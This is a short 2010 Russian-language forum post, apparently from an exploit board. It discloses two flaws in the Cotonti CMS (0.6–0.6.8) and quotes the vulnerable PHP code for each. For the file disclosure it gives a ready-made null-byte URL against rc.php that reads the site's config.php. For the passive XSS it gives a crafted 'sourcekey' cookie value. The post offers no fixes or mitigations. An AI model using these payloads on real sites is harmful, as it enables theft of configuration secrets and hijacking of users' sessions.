01.07.2010, 12:44
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
С нами:
9132514
Репутация:
41
|
|
Cotonti (0.6 - 0.6.8)
http://www.cotonti.com/downloads/releases/
File Disclosure
magic_quotes = Off
File: rc.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$src_uri[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uri'[/COLOR][COLOR="#007700"]];
if (![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$src_uri[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'HTTP/1.1 404 Not Found'[/COLOR][COLOR="#007700"]);
echo([/COLOR][COLOR="#DD0000"]'HTTP 404 - Not Found'[/COLOR][COLOR="#007700"]);
exit;
}
...
if (!isset([/COLOR][COLOR="#0000BB"]$known_content_types[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$file_extension[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'HTTP/1.1 403 Forbidden'[/COLOR][COLOR="#007700"]);
echo([/COLOR][COLOR="#DD0000"]'HTTP 403 - Forbidden'[/COLOR][COLOR="#007700"]);
exit;
}
...
[/COLOR][COLOR="#0000BB"]$dst_uri[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$src_uri[/COLOR][COLOR="#007700"];
...
[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dst_uri[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Код:
http://site/rc.php?uri=datas/config.php%00.js
Passive XSS
File: system/common.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(empty([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sourcekey'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'xk'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]mb_strtoupper[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sed_unique[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$update_sid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]", user_sid = '[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'xk'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]sed_setcookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'sourcekey'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'xk'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]()+[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cookielifetime'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cookiepath'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cookiedomain'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'secure'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
}
else
{
[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'xk'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sourcekey'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$update_sid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
File: system/functions.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]sed_xp[/COLOR][COLOR="#007700"]()
{
global[/COLOR][COLOR="#0000BB"]$sys[/COLOR][COLOR="#007700"];
return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
Код:
COOKIE
sourcekey = ">123
|
|
|